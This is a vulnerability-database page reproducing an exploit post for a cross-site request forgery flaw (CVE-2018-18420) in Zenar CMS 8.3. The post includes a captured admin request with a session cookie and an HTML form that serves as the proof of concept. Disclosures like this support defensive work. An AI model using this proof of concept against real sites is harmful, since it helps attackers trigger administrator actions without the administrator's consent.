Vulners
Lucene search
Zenar Content Management System 8.3 Cross Site Request Forgery
🗓️ 18 Oct 2018 00:00:00Reported by Ismail TasdelenType 
packetstorm🔗 packetstormsecurity.com👁 48 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Zenar Content Management System Cross-Site Request Forgery Vulnerability | 22 Oct 201800:00 | – | cnvd |
 | CVE-2018-18420 | 19 Oct 201822:00 | – | cve |
 | CVE-2018-18420 | 19 Oct 201822:00 | – | cvelist |
 | EUVD-2022-1880 | 3 Oct 202520:07 | – | euvd |
 | Zenario CMS vulnerable to CSRF | 14 May 202201:53 | – | github |
 | CVE-2018-18420 | 19 Oct 201822:29 | – | nvd |
 | CVE-2018-18420 | 19 Oct 201822:29 | – | osv |
| GHSA-22CQ-XXR9-JRRV Zenario CMS vulnerable to CSRF | 14 May 202201:53 | – | osv |
 | Cross site request forgery (csrf) | 19 Oct 201822:29 | – | prion |
 | Cross-Site Request Forgery (CSRF) | 22 Oct 201809:32 | – | veracode |
10
`# Exploit Title: Zenar Content Management System 8.3 - Cross-Site Request Forgery ( CSRF )
# Date: 2018-05-21
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://zenar.io/
# Software Link : https://github.com/TribalSystems/Zenario/releases/tag/8.3.47997
# Software : Zenar Content Management System 8.3
# Version : 8.3
# Vulernability Type : Web Application
# Vulenrability : Cross-Site Request Forgery ( CSRF )
# CVE : CVE-2018-18420
# Cross-Site Request Forgery (CSRF) vulnerability was discovered in
# the 8.3 version of Zenar Content Management System via the
# admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent URI.
# POC :
# GET Request :
Request URL: http://demo.zenar.io/zenario/admin/organizer.ajax.php?path=zenario__content%2Fpanels%2Fcontent&skinId=&refinerId=html&refinerName=content_type&refiner__content_type=html&_limit=50&_start=0&_item=html_10&_sort_col=first_created_datetime&_sort_desc=0
Request Method: GET
Status Code: 200 OK
Remote Address: 213.146.173.88:80
Referrer Policy: no-referrer-when-downgrade
Accept: text/plain, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Cookie: PHPSESSID=1jltufrek0ugagehl7fjieeud6; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1
Host: demo.zenar.io
Referer: http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Mobile Safari/537.36
X-Requested-With: XMLHttpRequest
# Query String Parametres :
path: zenario__content/panels/content
skinId:
refinerId: html
refinerName: content_type
refiner__content_type: html
_limit: 50
_start: 0
_item: html_10
_sort_col: first_created_datetime
_sort_desc: 0
# CSRF HTML :
<html><head>
<title> Zenar Content Management System - Cross-Site Request Forgery ( CSRF ) </title>
</head><body>
<form action="http://demo.zenar.io/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__content/panels/content/refiners/content_type//html//html_" method="GET">
<input type="text" name="html_" value="10" /><br />
<input type='submit' value='Go!' />
</form>
</body></html>
# You want to follow my activity ?
https://www.linkedin.com/in/ismailtasdelen
https://github.com/ismailtasdelen
https://twitter.com/ismailtsdln
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Oct 2018 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.00127